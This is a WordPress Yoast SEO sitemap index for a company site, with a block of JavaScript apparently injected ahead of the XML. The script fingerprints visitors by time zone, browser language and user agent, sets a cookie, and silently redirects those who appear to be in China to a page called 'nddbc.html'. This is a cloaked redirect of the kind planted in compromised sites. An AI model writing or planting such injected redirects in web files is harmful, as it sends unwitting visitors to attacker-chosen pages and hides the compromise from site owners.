<script type="text/javascript">
    
    var hereTime = getTimeZone();
    var hereLang = getLanguage();
    var TimeLang = hereTime + hereLang;

    function setCookie(cname,cvalue,exdays){
        var d = new Date();
        d.setTime(d.getTime()+(exdays*24*60*60*1000));
        var expires = "expires="+d.toGMTString();
        document.cookie = cname + "=" + cvalue + "; " + expires;
    }

    function getCookie(cname){
        var name = cname + "=";
        var ca = document.cookie.split(';');
        for(var i=0; i<ca.length; i++)
        {
            var c = ca[i].trim();
            if (c.indexOf(name)==0) return c.substring(name.length,c.length);
        }
        return "";
    }

    function checkCookie(){
        var China = getCookie("Chinese");
        if (China != "")
        {
            return China;
        }
        else
        {
            China = TimeLang;
            if (China != "" && China != null)
            {
                setCookie("Chinese",China,1);
            }
        }
    }

    function getTimeZone(){
        if(navigator.userAgent.indexOf("Win") > -1){

            var timeZone = new Date().toString();

            if(navigator.userAgent.indexOf("Firefox") > -1 || navigator.userAgent.indexOf("NET") > -1 || navigator.userAgent.indexOf("MetaSr") > -1 || navigator.userAgent.indexOf("Version") > -1){
                if(timeZone.indexOf('+0800') > -1 || timeZone.indexOf("China") > -1){
                    return '1';
                }else{
                    return '0';
                }
            }else{
                if(timeZone.indexOf("China") > -1 || timeZone.indexOf("中国") > -1){
                    return '1';
                }else{
                    return '0';
                }
            }

        }else{
            var split = new Date().toString().split(" ");
            var timeZoneFormatted = split[split.length - 2] + " " + split[split.length - 1];

            if(timeZoneFormatted.indexOf("+0800") > -1 && timeZoneFormatted.indexOf("CST") > -1){
                return '1';
            }else{
                return '0';
            }
        }
    }
    function getLanguage(){
        if(navigator.userAgent.indexOf("NET") > -1){
            var wLang = navigator.systemLanguage;
            if(wLang == "zh-cn" || wLang.indexOf("en") > -1){
                return '1';
            }else{
                return '0';
            }
        }else{
            var wLang = window.navigator.language;
            if(wLang == "zh-CN" || wLang == "zh-cn" || wLang.indexOf("en") > -1){
                return '1';
            }else if(wLang == "zh-Hans-CN"){
                return '1';
            }else{
                return '0';
            }        }    }
    if(getCookie('Chinese') != ""){
        if(checkCookie() == '11')document.location.href ='nddbc.html';
    }else{
        checkCookie();
        if(TimeLang == '11')document.location.href ='nddbc.html';
    }
</script><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//comfastgroup.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://comfastgroup.com/post-sitemap.xml</loc>
		<lastmod>2024-10-29T10:12:35+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://comfastgroup.com/page-sitemap.xml</loc>
		<lastmod>2025-11-26T16:25:17+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://comfastgroup.com/product-sitemap.xml</loc>
		<lastmod>2026-08-09T11:34:09+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://comfastgroup.com/category-sitemap.xml</loc>
		<lastmod>2024-10-29T10:12:35+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://comfastgroup.com/product_cat-sitemap.xml</loc>
		<lastmod>2026-08-09T11:34:09+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://comfastgroup.com/product_tag-sitemap.xml</loc>
		<lastmod>2026-08-09T11:34:09+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->